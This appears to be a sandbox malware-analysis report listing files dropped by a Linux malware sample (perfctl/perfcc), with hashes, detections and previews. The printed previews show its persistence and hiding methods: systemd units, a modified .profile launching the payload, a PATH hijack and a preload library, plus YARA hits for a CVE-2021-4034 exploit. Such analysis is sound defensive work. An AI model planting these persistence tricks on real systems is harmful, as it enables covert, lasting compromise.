SHA1:	CBAB50BEA29B5677E8B6C3D67B0661C3AD930447
SHA-256:	F4EAA0890A404BF12EF584259602163B58A07929A2F03BBB8145B665CD51B9E4
SHA-512:	075CA81F7736EBA4D1F33B501A9C65E87973B354D9DCE09EF7012679705CF326CCAC5CB5B2F81D321A2EEC7D0345D9C024E064A8D0C3DC4F8DF36D771252474A
Malicious:	true
Preview:	/lib/libgcwrap.so

/etc/profile

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ASCII text
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.422000516883152
Encrypted:	false
SSDEEP:	3:wVKBPkMKsLQHIc:wiMl
MD5:	A82E9F6E59A8D405F576361A96BBD782
SHA1:	5735D6685324B9077A5E2B22B1ED9D2EB9A512DB
SHA-256:	235835A542CFE8BDA945C4163C6240589E38DB203516EE2C45D0682BFF547A9D
SHA-512:	6D71C3063462696D8F7DED2526C4C5E91BABA5CCFD3E356C1C26C46A1E16D47CE120C0EECB643F701E6501F764CD6EC893076D2CAF40582677EAAC72A1EC3909
Malicious:	true
Preview:	.export PATH=/bin/.local/bin:$PATH.

/etc/systemd/system/kmodaudit.service

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ASCII text
Category:	dropped
Size (bytes):	279
Entropy (8bit):	4.797020269226004
Encrypted:	false
SSDEEP:	6:z8ymuizAZPUr8+Qqk+WdHK++y8gdQXaA2OvE25ZLQmWA4Rv:z+zAZhNnlK+QXIOB7LHWrv
MD5:	8B2DA5F899812804B5545D186941FD0E
SHA1:	ADDBAF2140B433934B75A0F58BD4CED35D8A2B4F
SHA-256:	9D113848AAFA9670100D9973963DE30B1CC56F3EC465318D29C80B09384FDD70
SHA-512:	AB99A3A9A8F1DEF55D16FD16A565C97D23334C7B2DAD91CD7F62BC5B11B75F47E0B233311FCF54F444D8BFB75A8A453B68B3640C69EE66E66E6241BB0B7C05D2
Malicious:	false
Preview:	[Unit].Description=Kernel module perf audit and reporting.Wants=kmodaudit.timer.[Service].Type=oneshot.RemainAfterExit=yes.Environment=FSYSD=sd.ExecStart=/bin/perfcc.StandardOutput=null.StandardError=null.TimeoutStopSec=1s.TimeoutStartSec=1y.[Install].WantedBy=multi-user.target.

/etc/systemd/system/kmodaudit.timer

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ASCII text
Category:	dropped
Size (bytes):	223
Entropy (8bit):	5.104809676733568
Encrypted:	false
SSDEEP:	6:z8ymuizAZbAEvl+QYI1ErILdnUx+tri4v:z+zAZKQHOcLdU4tri4v
MD5:	418E4AF2BD8A00CECA35CA120DF3E2F0
SHA1:	7F4E149AD7C776A50D24F8949B6CE518D4734A89
SHA-256:	D46EF6FE308084C60FBBCA6B22C324BB8E0BEB355115EC9212BE64CDE0E5808C
SHA-512:	3B1BB9DB87FF787AC368C6CE2407BAB0112E09C214B4ECA22ABB4CCD967A9D03DDB4044A67F54E6755F04CAE78B646E6693ED96EAF3DB513F7BC1CF1CAD1C093
Malicious:	false
Preview:	[Unit].Description=Kernel module perf audit and reporting.Requires=kmodaudit.service.[Timer].Unit=kmodaudit.service.OnCalendar=--* 00,02,04,06,08,10,12,14,16,18,20,22:45:00.AccuracySec=5m.[Install].WantedBy=timers.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/proc/6465/oom_score_adj

Download File

Process:	/usr/sbin/sshd
File Type:	ASCII text
Category:	dropped
Size (bytes):	6
Entropy (8bit):	1.7924812503605778
Encrypted:	false
SSDEEP:	3:ptn:Dn
MD5:	CBF282CC55ED0792C33D10003D1F760A
SHA1:	007DD8BD75468E6B7ABA4285E9B267202C7EAEED
SHA-256:	FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
SHA-512:	4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
Malicious:	false
Preview:	-1000.

/proc/sys/kernel/core_pattern

Download File

Process:	/bin/sh
File Type:	ASCII text
Category:	dropped
Size (bytes):	27
Entropy (8bit):	3.633974075997158
Encrypted:	false
SSDEEP:	3:M7m2AhI:uihI
MD5:	BF333D4A81FBC336E563C92C920541CD
SHA1:	5A8D32B75EBB0A3DF5D061FC9AD0D337DAA84693
SHA-256:	1BFF35A16BC435DFF8EE31A28A22F3EE0F29366343723578FE9E716C5F334702
SHA-512:	536E15C40C1A263D0D94088762793657867E0B925116ECAFD962D1B630D563C13BF2401F3892B9472BCD133B6BC023E9673C8F4A6B19B345F02289D4633EF5DB
Malicious:	false
Preview:	/etc/coredumps/%e.%p.%u.%t.

/root/.config/cron/perfcc

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
Category:	dropped
Size (bytes):	46507495
Entropy (8bit):	7.785600290387435
Encrypted:	false
SSDEEP:	786432:WZ7oJ7O3TnJZ7oJ7O3TnJZ7oJ7O3TnJZ7oJ7O3TnJZ7oJ7O3Tn2:WZ7igJZ7igJZ7igJZ7igJZ7ig2
MD5:	AF08D80F438C30D115E9EA62833BC950
SHA1:	9D7B3C964D05CAAECE3A2F52F4A42E1F90F6CF16
SHA-256:	F0AFE8593CC7EABA8CE8E97ADA48E6A59E2D277055EDC7788832DD4CE4C0FAD6
SHA-512:	80EDD6315D3F455372D42E6ECF507D3AD5BE6FFECE8AD8600F66841841992810839BF3D0CDA6E29A163D5272BEDFF770C7FA48B018C3A9C78F4712405720DF69
Malicious:	true
Yara Hits:	Rule: Linux_Exploit_CVE_2021_4034_1c8f235d, Description: unknown, Source: /root/.config/cron/perfcc, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF..............>.....X.......@...................@.8...@.......................@.......@..................... .............................................H=..............Q.td.....................................................>U............ ... ...X...\|......... ..ELF......>....@..6..@/`..I&8.....6....W...@.@..6... .o....l......E...'/....xi,o.....@........o..Xh!_.Q.td..$..`.o.$I.......e......"..PX..H.Ml...%.......'..`....C@....v;....E.U...10....{....<+].......d.1..I.....E1...`n/P..?....r.\....\........}.w...!.....u.....Q......}.wqke...\_Y]T.N.H.r.\B<60Q....+.H....\|$...#.A....~....)n=.H.H..H.5....2...\...{.7"W.I.....o....@.H....@X..8F.?....<..7K.H=.t......{..t..!...=.....H..?.......H..H..a.=..-?..].u&U\..bG..@.........B..iJ.]..;.....U...m.GuiL].\|....w.f....%.I;....f.v8Mtl$....tF..D$ \$(f....!..;..,.I....S..^....S7.O.....L.d....$.M........$.......$...TL....0............v.+..<..}...1.L......1."9......q.o./.9.....)..{.I..H...w.....!....\|..8cpu..\|..u.1..

/root/sedn0lH20

Download File

Process:	/usr/bin/sed
File Type:	ASCII text
Category:	dropped
Size (bytes):	204
Entropy (8bit):	4.863981156612972
Encrypted:	false
SSDEEP:	3:S8PAtAP0nDo4twHW19BMLvdp3YIkqdvO+jk2PffAO3WNCTFUwH/NY5MbM4KxL/Hv:S84yCo4t719BsMBqkgHfVFUwiTn
MD5:	8884179B17B82A0466823692F2E7B118
SHA1:	52AEDCE26D9E14805DAE7ADEABDA7ACFDAB6B64F
SHA-256:	F9CA66A0174B0BA210DBCE1E9835D54E99BB46C0B3D586ABA8E7A76A71EA5C3E
SHA-512:	633C8B3325D6B90F1BC8F094B50DE6F52E05FFC19EE6BA96151E91A132A162C1FBF3287639D3111014CFDD76CD2244C1799573587C40B01CB34D9F93FDF969F7
Malicious:	false
Preview:	# ~/.profile: executed by Bourne-compatible login shells..test -x /bin/perfcc && FPROF=p /bin/perfcc..if [ "$BASH" ]; then. if [ -f ~/.bashrc ]; then. . ~/.bashrc. fi.fi..mesg n 2> /dev/null \|\| true.

/run/sshd.pid

Download File

Process:	/usr/sbin/sshd
File Type:	ASCII text
Category:	dropped
Size (bytes):	5
Entropy (8bit):	1.9219280948873623
Encrypted:	false
SSDEEP:	3:I:I
MD5:	6BC92FB54D6B27BB11495D88235A9D65
SHA1:	C205B307DBACF4F4CCB444FA1469B236AD8A0945
SHA-256:	55DF085D41FA16C207A1C565A41B9EF6E3B88B8F1CFAFB153A7B0ABE987A0E33
SHA-512:	4EC6DD364E0E5BFF0DB90F9CB1982ED69855F6F7FC1E9A776C060B09B7C309D30D238FF1198F5206BB5A7D0138BBCC4A37C2844B3BE9289FA28C362178921677
Malicious:	false
Preview:	6465.

/run/systemd/journal/streams/.#9:93189KnCufy

Download File

Process:	/lib/systemd/systemd-journald
File Type:	ASCII text
Category:	dropped
Size (bytes):	223
Entropy (8bit):	5.502588194852963
Encrypted:	false
SSDEEP:	3:SbFVVmFyinKMsPOYsn9ms954Hh6SnLAqC+h6KV+h6CQzuxmsPXO9VFEEYF2js7LH:SbFuFyLVIg1BG+f+Msv4FEEjji4s
MD5:	DC260670F36266F9735E64A18B624995
SHA1:	BB07BDFECC05B54ACF6BFB4CCA05B6ECC0202C1B
SHA-256:	AFDA0D022CECB16915FF870767FF42A4CF587CF965AED49250E2A698EA4BB3D6
SHA-512:	413F3789AC30A1D70E531019E856A7B37CC9F689CBA873E577C3B8A15C8B812065B8D62EDD2E71F62B4357BD022980331E5354FC6E2884FA19B052F02A95723F
Malicious:	false
Preview:	# This is private data. Do not parse.PRIORITY=30.LEVEL_PREFIX=1.FORWARD_TO_SYSLOG=0.FORWARD_TO_KMSG=0.FORWARD_TO_CONSOLE=0.STREAM_ID=f13258a32ade4afda11d019a65577e96.IDENTIFIER=journalctl.UNIT=systemd-journal-flush.service.

/run/systemd/journal/streams/.#9:93213f9dc5y

Download File

Process:	/lib/systemd/systemd-journald
File Type:	ASCII text
Category:	dropped
Size (bytes):	238
Entropy (8bit):	5.4698852241506115
Encrypted:	false
SSDEEP:	6:SbFuFyLVIg1BG+f+MFkjzDHSg2jfYAMpPUwMpWAu:qgFq6g10+f+MejfSgdAcZcWAu
MD5:	FC20E76E4575A0FD16A083AD8A413475
SHA1:	183A483E90DF1017EB453B72354E5B645B6F7555
SHA-256:	E371120C9015031AC5F1E4E3BCF4DD891E11BC1E8AC7CB268ABD357915554FEC
SHA-512:	E6CD9B526C8FC4CED043B99069D00C35104C94066D144B742264E67B67398E8FABCA76004BAF844B4C03B3838EA199C54C53C7841F31E18A269DBD754163BC71
Malicious:	false
Preview:	# This is private data. Do not parse.PRIORITY=30.LEVEL_PREFIX=1.FORWARD_TO_SYSLOG=0.FORWARD_TO_KMSG=0.FORWARD_TO_CONSOLE=0.STREAM_ID=cc5bd7b4f855409c922a2c4ef2873fbd.IDENTIFIER=unattended-upgrade-shutdown.UNIT=unattended-upgrades.service.

/tmp/.apid

Download File

Process:	/tmp/.perf.c/perfctl
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:d:d
MD5:	4C525A48ACC0084B077750AC333C67C1
SHA1:	CE5B9E3089FF3F94A4FF7682D0EFA2105E256D20
SHA-256:	3B4F01EB6C705624E4671BB7C744745276BCB05D3B7B323D83868530154E487C
SHA-512:	07BCDA0DB4AA8B9997E6945DD0B8ED963DDDA891E30EC5FC083E114FDF8D2FCF29D7E49821C3600695EF0E2DA931398A06CF274B9806E9B180E604F906713286
Malicious:	false
Preview:	6620

/tmp/.perf.c/gpg-agent

Download File

Process:	/usr/bin/cp
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
Category:	dropped
Size (bytes):	9301499
Entropy (8bit):	7.785600290387435
Encrypted:	false
SSDEEP:	196608:WVm8yS4rLDSkQLfkwE7tdQagxldCn588VM2ywSb2VEGCN4:WVm0GSkQLkN773+2MHzaV1C2
MD5:	656E22C65BF7C04D87B5AFBE52B8D800
SHA1:	0FD199053171FEC86BE186106EAC717C4EDAE2AD
SHA-256:	22E4A57AC560EBE1EFF8957906589F4DD5934EE555EBCC0F7BA613B07FAD2C13
SHA-512:	697954F75E391A6CC600B7D40509AC1A1515CB0A4234CC3AE4270BEAF7BBC3A3DA23A9CD4F25E0EB4F5956D24CA3866E2574DC9493644845AAC1063E1E4B0183
Malicious:	true
Yara Hits:	Rule: Linux_Exploit_CVE_2021_4034_1c8f235d, Description: unknown, Source: /tmp/.perf.c/gpg-agent, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68% Antivirus: Virustotal, Detection: 62%, Browse
Preview:	.ELF..............>.....X.......@...................@.8...@.......................@.......@..................... .............................................H=..............Q.td.....................................................>U............ ... ...X...\|......... ..ELF......>....@..6..@/`..I&8.....6....W...@.@..6... .o....l......E...'/....xi,o.....@........o..Xh!_.Q.td..$..`.o.$I.......e......"..PX..H.Ml...%.......'..`....C@....v;....E.U...10....{....<+].......d.1..I.....E1...`n/P..?....r.\....\........}.w...!.....u.....Q......}.wqke...\_Y]T.N.H.r.\B<60Q....+.H....\|$...#.A....~....)n=.H.H..H.5....2...\...{.7"W.I.....o....@.H....@X..8F.?....<..7K.H=.t......{..t..!...=.....H..?.......H..H..a.=..-?..].u&U\..bG..@.........B..iJ.]..;.....U...m.GuiL].\|....w.f....%.I;....f.v8Mtl$....tF..D$ \$(f....!..;..,.I....S..^....S7.O.....L.d....$.M........$.......$...TL....0............v.+..<..}...1.L......1."9......q.o./.9.....)..{.I..H...w.....!....\|..8cpu..\|..u.1..

/tmp/.perf.c/perfctl

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
Category:	dropped
Size (bytes):	1727132
Entropy (8bit):	7.921099857749721
Encrypted:	false
SSDEEP:	49152:fZhcosfxq5kyeYhrE96Bb0x4rlpa741oJ4:BsfxZhYhrEG0Ql4s1oW
MD5:	6E7230DBE35DF5B46DCD08975A0CC87F
SHA1:	3DE0A2F76F95375C1C078A465683415BDA99F01B
SHA-256:	E16FB2A22FCE5241565784B5A8518ED2BECC9948D4C398093EDBB70A946F9331
SHA-512:	DF5C9CAAEBEC5ADBC291F11B27A003602E6E01A25634C920E4CC4CC1F204845849F9967357A9F2A53B5799CE460CEEEA04A3F04E03256FC46668BECAA801DD5D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 68% Antivirus: Virustotal, Detection: 59%, Browse
Preview:	.ELF..............>......OZ.....@...................@.8...@.......................@.......@......X.......X........ ......................`Z......`Z..............'T.............Q.td....................................................(%@C....@.........E...E.X...~......... ..ELF......>..c.@..6..@/P.EG&8.....6....W...@.10.6.E. .o....i..?/....[W...H.o...o...`[..Q.td.....a)oR.B..{.p...J.$I.......E..$.......>..PX..AT...UP.bl.......v.H......M+....@(...vk..H.EP....qRI..$.....hL....\4.....C...}3.u...<.p.[.......9...a23T.(......j(x.vcF.W.pgH^.L.....k+.X...%.{.H9<....$t..^.1.J... ...K...ia.r.9.L.p.aH.G.Z4O$.=-.TIs.Lv....j.:.............9.T.]...'O...I..0..m..)+..r2...w'...S3_.=.'..~...`$.y~..N.'I9.h../>.v..v.\.H.Y4....$G.s#..6.+..\....w..D$0..\|$8L9.>........{...A.;9`..\q.7.o....M}_..6."...x.E....(.J[.$(....E1.B..f....G...rG.o.N.)@.\..H.`..{.n.......}./...X4E..o.=.sT.....b=u.e...hR.%.[...V.5..o{yX>=..g;.)dn5}..[.`+8...1K...AU.=.....A...U.^.Z....IP.p..D..#....D.e

/tmp/.perf.c/raid5wq

Download File

Process:	/usr/bin/cp
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
Category:	dropped
Size (bytes):	9301499
Entropy (8bit):	7.785600290387435
Encrypted:	false
SSDEEP:	196608:WVm8yS4rLDSkQLfkwE7tdQagxldCn588VM2ywSb2VEGCN4:WVm0GSkQLkN773+2MHzaV1C2
MD5:	656E22C65BF7C04D87B5AFBE52B8D800
SHA1:	0FD199053171FEC86BE186106EAC717C4EDAE2AD
SHA-256:	22E4A57AC560EBE1EFF8957906589F4DD5934EE555EBCC0F7BA613B07FAD2C13
SHA-512:	697954F75E391A6CC600B7D40509AC1A1515CB0A4234CC3AE4270BEAF7BBC3A3DA23A9CD4F25E0EB4F5956D24CA3866E2574DC9493644845AAC1063E1E4B0183
Malicious:	true
Yara Hits:	Rule: Linux_Exploit_CVE_2021_4034_1c8f235d, Description: unknown, Source: /tmp/.perf.c/raid5wq, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68% Antivirus: Virustotal, Detection: 62%, Browse
Preview:	.ELF..............>.....X.......@...................@.8...@.......................@.......@..................... .............................................H=..............Q.td.....................................................>U............ ... ...X...\|......... ..ELF......>....@..6..@/`..I&8.....6....W...@.@..6... .o....l......E...'/....xi,o.....@........o..Xh!_.Q.td..$..`.o.$I.......e......"..PX..H.Ml...%.......'..`....C@....v;....E.U...10....{....<+].......d.1..I.....E1...`n/P..?....r.\....\........}.w...!.....u.....Q......}.wqke...\_Y]T.N.H.r.\B<60Q....+.H....\|$...#.A....~....)n=.H.H..H.5....2...\...{.7"W.I.....o....@.H....@X..8F.?....<..7K.H=.t......{..t..!...=.....H..?.......H..H..a.=..-?..].u&U\..bG..@.........B..iJ.]..;.....U...m.GuiL].\|....w.f....%.I;....f.v8Mtl$....tF..D$ \$(f....!..;..,.I....S..^....S7.O.....L.d....$.M........$.......$...TL....0............v.+..<..}...1.L......1."9......q.o./.9.....)..{.I..H...w.....!....\|..8cpu..\|..u.1..

/tmp/.xdiag/cp

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.7841837197791883
Encrypted:	false
SSDEEP:	3:TgLqTxQn:TgLqTWn
MD5:	A19A60CACDCAC527235830E69FAF0487
SHA1:	103E2C959EB2B93A96D53B6CB93B8332DA0012FC
SHA-256:	839CECFD1529152881B269B19EADF9E1980AE5BC416EDD9E5DE1556569CD3408
SHA-512:	7D60B9E11488DA9497965EB28794ED2E4FD27F6ED972F26531DF0DE87C8D5569C0117FB58DCAD0C73D0C1F17ED3B65767DC8B416A683C49874BA1862536E6DBF
Malicious:	false
Preview:	/tmp/.perf.c/raid5wq

/tmp/.xdiag/elog

Download File

Process:	/tmp/.perf.c/gpg-agent
File Type:	ASCII text
Category:	dropped
Size (bytes):	35
Entropy (8bit):	3.3718608739641964
Encrypted:	false
SSDEEP:	3:MIUi5B9GVFvyn:MIUi5ivy
MD5:	D02D7EA4C3A593C6ED3CB895BEB301F8
SHA1:	F5CC1CAFED6285B1C1687C0D77C7CADA65544C23
SHA-256:	157A5FF83514CB0F9C9D85DB7F04D4F9EF3C47BB302D446C93634D0E6930D877
SHA-512:	CB75018E81C310FE7243EF8ABBD0A0BB75DFCD5560C0B1E0281B3F212AF416E2DFF2C9246B02222C7678E13B7228C91AAA12375A9B252F3B1035EE1AF0A0D6EB
Malicious:	false
Preview:	10-10-2024 06:02:27.0510 0 1:6684.

/tmp/.xdiag/exi

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	2.59490661824394
Encrypted:	false
SSDEEP:	3:fuMRf0XMRf0XMRf0XMRf0XMRf0XMRf0XMRf0XMRn:2E0XE0XE0XE0XE0XE0XE0XG
MD5:	40AB9EF78EDE840485B659830AA47404
SHA1:	0ACCE45A4A9671204405ABDBCD8A8EFC2B1C60EB
SHA-256:	A6125F3E42179F25F9F6A01C664C431BFD837189D30891524F6520C4E6D3312E
SHA-512:	CEA99F93D4BC2C68783CB9DB4A8A649A1C1FF7F3A599B172459D6729C5D63D6D40ED89D8E7EEEA7D3C9D6692D134E996DF5EB84C1C436A3358982906CCC21F31
Malicious:	false
Preview:	8.46.123.338.46.123.338.46.123.338.46.123.338.46.123.338.46.123.338.46.123.338.46.123.33

/tmp/.xdiag/int/.e.lock

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:sn:sn
MD5:	CC9B3C69B56DF284846BF2432F1CBA90
SHA1:	8EDC876B9222F23379F666107CF18B6D810E89C5
SHA-256:	12387FAE8391114DE975FD051E6619CAA15D46171A27DDC63A6C4562C9B75DA6
SHA-512:	BEB128558AC3ECA1EAC9A8259CF603DEE57B4916C6B091B047C5AFF0ED0589E1049C4D71F118B54D1E1B16A66B95C9277F2E881E50084D616DED7F22B5987E67
Malicious:	false
Preview:	6269

/tmp/.xdiag/p

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:sn:sn
MD5:	CC9B3C69B56DF284846BF2432F1CBA90
SHA1:	8EDC876B9222F23379F666107CF18B6D810E89C5
SHA-256:	12387FAE8391114DE975FD051E6619CAA15D46171A27DDC63A6C4562C9B75DA6
SHA-512:	BEB128558AC3ECA1EAC9A8259CF603DEE57B4916C6B091B047C5AFF0ED0589E1049C4D71F118B54D1E1B16A66B95C9277F2E881E50084D616DED7F22B5987E67
Malicious:	false
Preview:	6269

/tmp/.xdiag/uid

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

/tmp/.xdiag/ver

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	18
Entropy (8bit):	3.4193819456463714
Encrypted:	false
SSDEEP:	3:2IJUIT/sFUT:2IaIT/TT
MD5:	BE3F0172F141AC769936CABE8C54AD72
SHA1:	AB60CE77A0C866D2D1919F6EA01120EF0297F0B2
SHA-256:	3DE4841E5A18D29D8549D60F098E7663254574EFB790E659458341D9A967D506
SHA-512:	9AB39CD5451BA0D87C11F37A6188AD4123EC167F89A4F7DDB9592ACFEBF24E67917F91F66F54FEFF5D54BBB37FE8427400871FD2B22DD009BE6FA561ACCCA90E
Malicious:	false
Preview:	az-v4.1-6-gb108b16

/tmp/lgctr

Download File

Process:	/usr/bin/ls
File Type:	Arhangel archive data
Category:	dropped
Size (bytes):	1968
Entropy (8bit):	4.68285288127715
Encrypted:	false
SSDEEP:	24:RalWx9dDEttRoMtlNANc0+IIGq9SGbMlyG8DX3G65G6opuxG69OkfGDtP2tfktb:pNrg0rqRAlD8DXW6w65I6QlV3
MD5:	23CFCAEC7B93CB745660F5A65DB94B6C
SHA1:	2CD7F5D675D5DD79FB24CDE8D0E71A5C0A1B3439
SHA-256:	083B1BC076889530D3D210AB1774BDB0C349B5E3D5A6A8625A2D992CF8C469D4
SHA-512:	6F8407080EEBFA84CB4BBE93AA2F406146FBBDCCD0C963ED8893DFE7CD776CE50A80DF8F1AA9138BF670B5D2C6EF26E3E1D87169892E38483B1AEC15D917D5FA
Malicious:	false
Preview:	LGCTR0-XR.total 76.drwxrwxrwt 20 root root 4096 Oct 10 06:01 ..drwxr-xr-x 20 root root 4096 Aug 17 2021 ...-rw------- 1 saturnino saturnino 0 Aug 25 2021 config-err-dHT8bZ.lrwxrwxrwx 1 root root 30 Oct 10 06:00 dmesgtail.log -> /var/jbx/shared/logs/dmesg.log.drwxrwxrwt 2 root root 4096 Aug 25 2021 .font-unix.drwxr-xr-x 2 root root 4096 Oct 10 05:59 hsperfdata_root.drwxrwxrwt 2 root root 4096 Aug 25 2021 .ICE-unix.-rw-r--r-- 1 root root 0 Oct 10 06:01 lgcdm.-rw-r--r-- 1 root root 0 Oct 10 06:01 lgctr.drwx------ 3 root root 4096 Aug 25 2021 snap.lxd.drwx------ 2 saturnino saturnino 4096 Aug 25 2021 ssh-hOQ5FjG2iVgO.drwx------ 3 root root 4096 Aug 25 2021 systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e.drwx------ 3 root root 4096 Sep 17 2021 systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f.drwx------ 3 root

/tmp/lgctr2

Download File

Process:	/usr/bin/cat
File Type:	ASCII text
Category:	dropped
Size (bytes):	33
Entropy (8bit):	4.354852073838348
Encrypted:	false
SSDEEP:	3:9WyzdvCfN:3kN
MD5:	012E94C2AC42DDFB14D760D894FEE27C
SHA1:	2113D7DB30EC0147647F4350C01E011B89340ECE
SHA-256:	743B4869CC49A3A614AF3619E9574D14CFBB3C8DB4840918931D9FE16CAF00DC
SHA-512:	E0C5B607B6325AA633001DBBDF4A42D57C3CFF32DABE45E6D271F3D9FC40A4C64C0095A4E484E65C982F79E8593E2E6BFAC1AD49E5F0244CCA762EEAA23CDA45
Malicious:	false
Preview:	BAQLznamq9t08rtq7O5LDzm0K5nqROAs.

/tmp/libgcwrap.so

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=0def91828514b6bb0a926e52c28d74fc2c8c8a04, stripped
Category:	dropped
Size (bytes):	161600
Entropy (8bit):	4.909740282389583
Encrypted:	false
SSDEEP:	3072:eYH0igZOTfIxofzviwFRsXFxakxYH0igZOTfIxofzviwFRsXFxak:eLFUQqviCRGNLFUQqviCRG
MD5:	5F544E5A0215E43E3E53B1BE4922DB5E
SHA1:	C9A632D4E3F5D97946439A8477745B9ADE946D8D
SHA-256:	08A7CAB8FBB9107108A180C9F7DD8BA6EBC98CBF74F7FDCF0CD60A864457992E
SHA-512:	FA8040980B8F4E95674F63A71E8663844128B7FA2137A3FDA620FA1B81614FF2D825414C8286D974F516D3961F09AEF248E3CD2072CBD2F4EBFA1A8B5F0C4DC7
Malicious:	false
Preview:	.ELF..............>......%......@....... 5..........@.8...@.....................................<.......<......... ....................... ....... ......6......(=........ ....................... ....... .............................................................$.......$...............P.td....................................................Q.td....................................................R.td.............. ....... .....`.......`...........................GNU.........nR.t.,.......%...X................. ..4......."..............5...... ....D)."Z.`B..:.......D.X...Y...[...\...]..._...b...c...d...........g...h...i...j...l...n...q.......r.......s...........t...w.......{...\|...}...............................w.\|..Z.QB.5.`...I.OBfK....\|. .-....}.s.....+..".3M.ls..AM.\|cQ.}...G.u.Z.;.-......\|..`.j...e... ...+&.7..z.#. .qX........=vo.p..\|..Z.!.....n.......G.c.CE...duUJ.).!t..X..h\..>...w............................................................d...............................

/usr/bin/.local/bin/crontab

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=de6121b4597424313e9fd5d14f29b41958cbbe98, for GNU/Linux 3.2.0, stripped
Category:	dropped
Size (bytes):	15728
Entropy (8bit):	3.6390376598838268
Encrypted:	false
SSDEEP:	192:Rsyw/dthDfDMcRQpD0fhi7qtJdPkHwxky0oiek:kd/vBRQpD0hfndP5xk
MD5:	C65E7BDF676BB1617301EFCE4B51A409
SHA1:	9F1ED8A688C5FD7E3822734496347D301A33C9EB
SHA-256:	9A61EE4FACE85EEFBFF2E1F66CE2BED035BC7E3BB4829EC2C4DFE4121C1D29A2
SHA-512:	C223416D0AD506390B518828FA19F6868241F9FB81D407D432A1C63CC7196AC3F6FCFE577A514432C055871B29BE322FCEB492D55C36F79C5070F53EC299CF78
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	.ELF..............>.............@.......p6..........@.8...@.............@.......@.......@.......h.......h................................................................................................................................................................................................ ....... ....... .......................................-.......=.......=......h................................-.......=.......=..............................................................D.......D...............P.td....X ......X ......X ..............................Q.td....................................................R.td.....-.......=.......=............................../lib64/ld-linux-x86-64.so.2.............GNU..a!.Yt$1>...O)..X..............GNU.................................0.....@..................k.e.m..@9..........................s.......................F........................... ...................#.......................8.......................?.......................

/usr/bin/.local/bin/htop

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=6aa5d9083a91239f0472edf942887c5579eb5365, for GNU/Linux 3.2.0, stripped
Category:	dropped
Size (bytes):	15952
